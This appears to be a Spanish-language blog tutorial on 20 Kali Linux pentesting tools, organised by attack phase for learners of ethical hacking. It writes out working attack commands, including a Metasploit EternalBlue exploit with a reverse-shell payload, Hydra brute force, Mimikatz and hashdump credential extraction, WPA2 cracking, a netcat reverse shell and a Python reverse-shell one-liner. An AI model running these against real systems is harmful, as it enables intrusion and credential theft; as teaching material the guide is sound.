¿Por qué Kali Linux?
Kali Linux es la distribución de referencia para seguridad ofensiva y pentesting profesional. Desarrollada por Offensive Security, se ha consolidado como el estándar de la industria gracias a su enfoque dedicado al hacking ético. A diferencia de otras distribuciones genéricas, Kali viene preinstalada con más de 600 herramientas organizadas por categorías y fases de un pentest, lo que elimina la necesidad de configurar el entorno desde cero.
Lo que diferencia a Kali de otras distros de seguridad es su ciclo de release continuo, su base Debian estable, y el soporte oficial de Offensive Security que mantiene las herramientas actualizadas. Además, es la distribución recomendada para certificaciones como OSCP y PNPT, lo que la convierte en la plataforma de aprendizaje natural para cualquiera que quiera certificarse en seguridad ofensiva.
Aquí están las 20 más importantes para un pentest profesional.
Instalación y configuración inicial
Antes de ejecutar cualquier herramienta, es fundamental configurar correctamente tu entorno. Kali se puede instalar de tres formas principales, cada una con sus ventajas:
Máquina virtual (Recomendado para principiantes)
La forma más segura de empezar. Descarga la imagen OVA desde kali.org y abrila en VirtualBox o VMware. Ventajas: snapshots para deshacer cambios, red aislada, y fácil eliminación si algo sale mal.
# Después de instalar, actualiza el sistema
sudo apt update && sudo apt upgrade -y
# Instala VMware Tools o Guest Additions para mejor rendimiento
sudo apt install -y open-vm-tools-desktop
WSL2 en Windows (Para quienes no quieren VM)
Kali está disponible oficialmente en Microsoft Store para WSL2. Es ligero y se integra con el terminal de Windows, pero tiene limitaciones: no soporta interfaces gráficas nativas ni monitores de modo monitor para WiFi.
# Instalar desde PowerShell (como administrador)
wsl --install -d kali-linux
# Actualizar después de la primera ejecución
sudo apt update && sudo apt upgrade -y
Instalación bare metal (Para pentesting real)
La mejor opción si vas a hacer auditorías reales o trabajas con hardware WiFi externo. Instala junto a tu SO principal con dual boot. Asegúrate de configurar cifrado LUKS en la partición de Kali para proteger los datos de pentest.
Consejo clave: Independientemente de la instalación, ejecuta sudo apt update && sudo apt upgrade -y inmediatamente después del primer boot. Kali actualiza sus repositorios constantemente y no quieres herramientas desactualizadas.
Fase 1: Reconocimiento
1. Nmap — Escaneo de redes
# Escaneo completo
sudo nmap -sV -sC -O -p- 192.168.1.1 -oA resultado
2. theHarvester — OSINT de dominios
# Recopilar emails, subdominios, IPs
theHarvester -d empresa.com -b all -l 500
3. Maltego — Visualización de relaciones
Herramienta gráfica para mapear relaciones entre entidades (dominios, IPs, personas, organizaciones). Ideal para OSINT avanzado.
4. Shodan CLI — Internet de las cosas expuesto
# Instalar
pip install shodan
# Buscar dispositivos vulnerables (solo con API key)
shodan search "apache 2.4.49" --fields ip_str,port,org
Fase 2: Escaneo de vulnerabilidades
5. Nikto — Escáner web
# Escaneo básico de servidor web
nikto -h https://target.com
# Con autenticación
nikto -h https://target.com -id usuario:password
6. OpenVAS / GVM — Escáner de vulnerabilidades
# Iniciar servicio
sudo gvm-start
# Acceder vía web: https://127.0.0.1:9392
7. FFUF — Fuzzing web ultrarrápido
# Fuzzing de directorios
ffuf -u https://target.com/FUZZ -w /usr/share/wordlists/dirb/common.txt -ac
# Fuzzing de parámetros
ffuf -u "https://target.com/page?id=1&FUZZ=test" \
-w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt -fc 400
Fase 3: Explotación
8. Metasploit Framework
# Iniciar consola
msfconsole
# Buscar exploit
msf6 > search eternalblue
# Usar un módulo
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit > set RHOSTS 192.168.1.100
msf6 exploit > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit > set LHOST 192.168.1.50
msf6 exploit > run
9. SQLMap — Inyección SQL automatizada
sqlmap -u "https://target.com/?id=1" --dbs --batch
10. Hydra — Fuerza bruta de credenciales
# SSH
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.1
# HTTP login form
hydra -l admin -P rockyou.txt 192.168.1.1 http-post-form \
"/login:user=^USER^&pass=^PASS^:Invalid credentials"
11. John the Ripper — Cracking de hashes
# Crackear hash NTLM
echo "hash_ntlm" > hash.txt
john --format=NT hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
# Mostrar resultados
john --show hash.txt
12. Hashcat — GPU cracking
# MD5 con diccionario
hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt
# SHA-256 con reglas
hashcat -m 1400 hash.txt rockyou.txt -r rules/best64.rule
Fase 4: Post-explotación
13. Meterpreter (Metasploit)
# Una vez con sesión abierta
meterpreter > sysinfo
meterpreter > getuid
meterpreter > hashdump # Extraer hashes
meterpreter > screenshot # Captura de pantalla
meterpreter > download archivo # Descargar archivo
meterpreter > shell # Shell del sistema
14. Mimikatz — Extracción de credenciales Windows
# En shell de Windows comprometido
privilege::debug
sekurlsa::logonpasswords # Credenciales en memoria
lsadump::sam # Hashes SAM
Fase 5: Análisis web
15. Burp Suite — Proxy de intercepción web
La herramienta más importante para pentesting web:
- Intercepta y modifica requests HTTP/S
- Scanner de vulnerabilidades (Pro)
- Repeater para pruebas manuales
- Intruder para fuerza bruta
# Iniciar Burp Suite Community
burpsuite &
16. OWASP ZAP — Alternativa gratuita a Burp
zaproxy &
# O modo línea de comandos
zap-cli quick-scan -s all https://target.com
17. WPScan — WordPress específico
# Enumerar usuarios y plugins
wpscan --url https://target.com --enumerate u,p,t
# Con API key para vulnerabilidades
wpscan --url https://target.com --api-token TU_TOKEN
Fase 6: Análisis de red
18. Wireshark — Análisis de paquetes
# Captura en interfaz eth0
sudo wireshark &
# Filtros útiles:
# http.request.method == "POST" → Ver forms
# tcp.port == 443 → HTTPS
# dns → Consultas DNS
19. Aircrack-ng — WiFi
# Poner en modo monitor
sudo airmon-ng start wlan0
# Capturar handshakes
sudo airodump-ng wlan0mon
# Crackear WPA2
aircrack-ng -w rockyou.txt captura.cap
20. Netcat — La navaja suiza de redes
# Listener (recibir conexión)
nc -lvnp 4444
# Shell reversa (en víctima)
nc 192.168.1.50 4444 -e /bin/bash
# Transferir archivos
# Receptor:
nc -lvnp 4444 > archivo.txt
# Emisor:
nc 192.168.1.50 4444 < archivo.txt
Resumen por fase
| Fase | Herramientas clave |
|---|---|
| Reconocimiento | Nmap, theHarvester, Shodan |
| Escaneo | Nikto, Gobuster, OpenVAS |
| Explotación | Metasploit, SQLMap, Hydra |
| Post-explotación | Meterpreter, Mimikatz |
| Web | Burp Suite, ZAP, WPScan |
| Red | Wireshark, Aircrack-ng, Netcat |
Herramientas de reconocimiento: una mirada más profunda
El reconocimiento es donde se gana o se pierde un pentest. Un reconocimiento pobre significa vectors de ataque perdidos. Aquí profundizamos en las tres herramientas fundamentales:
Nmap es más que un escáner de puertos. Con los scripts NSE (Nmap Scripting Engine) se convierte en una plataforma de automatización completa:
# Descubrir servicios y vulnerabilidades conocidas
sudo nmap -sV --script vuln -p- 192.168.1.0/24 -oA red_completa
# Escaneo sigiloso con timing ajustado
sudo nmap -sS -T2 --max-rate 100 -p 22,80,443 10.10.10.10
# Enumerar información detallada con scripts específicos
sudo nmap --script "http-enum,http-headers,ssl-cert" -p 80,443 target.com
Recon-ng es un framework de OSINT inspirado en Metasploit pero enfocado exclusivamente en reconocimiento. Permite crear módulos personalizados y guardar resultados en una base de datos interna:
# Iniciar Recon-ng
recon-ng
# Crear workspace
workspaces create proyecto_cliente
# Usar módulo de reconocimiento
modules load recon/domains-hosts/hackertarget
options set SOURCE empresa.com
run
# Ver resultados
show hosts
theHarvester complementa el reconocimiento técnico con OSINT de fuentes abiertas. Combínalo con Recon-ng para obtener un mapa completo del surface de ataque antes de pasar a escaneo activo.
Herramientas de explotación: flujo de trabajo real
Una vez identificadas las vulnerabilidades, el siguiente paso es la explotación. El flujo de trabajo típico en un pentest profesional sigue este orden:
Metasploit: el framework completo
Metasploit no es solo para "explotar y obtener shell". Es un framework completo para toda la fase de explotación y post-explotación:
# Flujo completo de explotación
msfconsole -q
# 1. Seleccionar y configurar el exploit
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100
set LHOST 192.168.1.50
set LPORT 4444
# 2. Verificar si el target es vulnerable (opcional pero recomendado)
check
# 3. Ejecutar
exploit
# 4. Post-explotación con meterpreter
sysinfo
getuid
hashdump
meterpreter > migrate explorer.exe # Mantener persistencia
Searchsploit: el catálogo offline de exploits
Cuando necesitas un exploit específico y no quieres depender de la base de datos de Metasploit:
# Buscar exploits por nombre de software
searchsploit apache 2.4.49
# Buscar y descargar exploit
searchsploit -m 50383.py
# Buscar por CVE
searchsploit CVE-2021-41773
# Excluir exploits que son solo PoC
searchsploit --exclude="PoC" apache 2.4
Flujo recomendado
- Identifica el servicio y versión con Nmap
- Busca exploits con Searchsploit o
msfconsole search - Verifica con
checkantes de explotar - Explota y obtén acceso inicial
- Escala privilegios con post-explotación
- Documenta todo para el informe final
Personalización de Kali Linux
Un pentester experimentado personaliza su entorno para maximizar productividad. Estas son las áreas clave:
Wordlists: tu arsenal de diccionarios
Kali incluye wordlists por defecto, pero para pentesting real necesitas más:
# SecLists: la colección definitiva (imprescindible)
sudo apt install seclists
ls /usr/share/seclists/
# Crunch: generar wordlists personalizados
crunch 8 8 -t @@@@1234 -o wordlist_custom.txt
# Cewl: generar wordlists desde websites
cewl https://target.com -w wordlist_empresa.txt -d 3 -m 5
Aliases y atajos de productividad
Agrega estos a tu ~/.bashrc o ~/.zshrc para trabajar más rápido:
# Aliases útiles
alias update='sudo apt update && sudo apt upgrade -y'
alias fscan='nmap -sV -sC -O -p-'
alias webdir='ffuf -u URL/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt'
alias listen='nc -lvnp 4444'
alias msfinit='systemctl start postgresql && msfconsole -q'
# Funcción para shells reversas rápidas
mkshell() { python3 -c "import socket,subprocess,os;s=socket.socket();s.connect(('IP',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/bash','-i'])"; }
Herramientas adicionales worth installing
# Impacket: protocolos de Windows
sudo apt install impacket-scripts
# CrackMapExec / NetExec: lateral movement
sudo apt install netexec
# Evil-WinRM: shell remota sobre WinRM
sudo apt install evil-winrm
Errores comunes de principiantes
Evita estos errores que todos cometen al empezar con Kali:
Ejecutar herramientas sin entender los flags. Copiar comandos de tutoriales sin saber qué hace cada parámetro es contraproducente. Si no sabes qué es -sV en Nmap, no deberías estar usando ese comando. Siempre consulta el --help o el man page antes de ejecutar.
No usar entornos aislados. Hacer escaneos o explotación contra redes que no owns es ilegal y peligroso. Usa siempre máquinas virtuales aisladas, labos de HackTheBox, o rangos IP designados como 192.168.0.0/24 en tu red doméstica.
Ignorar el reconocimiento y saltar a la explotación. El 70% del tiempo de un pentest debería estar en reconocimiento. Un exploit perfecto es inútil si apuntás al servicio equivocado.
No documentar nada. Si no documentas tus hallazgos mientras trabajas, vas a olvidar detalles críticos para el informe. Usa notas estructuradas desde el inicio: qué hiciste, qué encontraste, qué funcionó y qué no.
Subestimar el poder de la automatización. Metasploit, Nmap NSE, y scripts personalizados en Python te ahorran horas. Aprende a crear módulos básicos desde el primer día.
Usar solo herramientas gráficas. Si solo usas Burp Suite con mouse y no sabes usar curl o netcat desde terminal, vas a tener problemas en entornos sin GUI. Domina ambas formas de trabajar.
Conclusión
Kali Linux es un ecosistema completo para seguridad ofensiva. La clave no está en conocer todas las herramientas, sino en entender cuándo y cómo usar cada una dentro de una metodología estructurada. Practica siempre en entornos legales como HackTheBox o TryHackMe.
Artículos Relacionados
- Introducción al Ethical Hacking: Fundamentos y Marco Legal — Conoce las metodologías, el marco legal y las fases de un pentest profesional antes de usar las herramientas.
- Nmap: Guía Completa de Escaneo de Redes — Domina la herramienta de reconocimiento más importante de Kali Linux con técnicas avanzadas de escaneo.
- Pentesting Web con OWASP Top 10: Guía Práctica — Aplica las herramientas de Kali Linux para testing de aplicaciones web siguiendo la metodología OWASP.
- Hacking Ético: Salario, Certificaciones y Cómo Empezar — Salarios, certificaciones CEH/OSCP/PNPT y hoja de ruta
🔧 Herramienta relacionada: Aprende a usar [Nmap] paso a paso en nuestra guía completa de herramientas.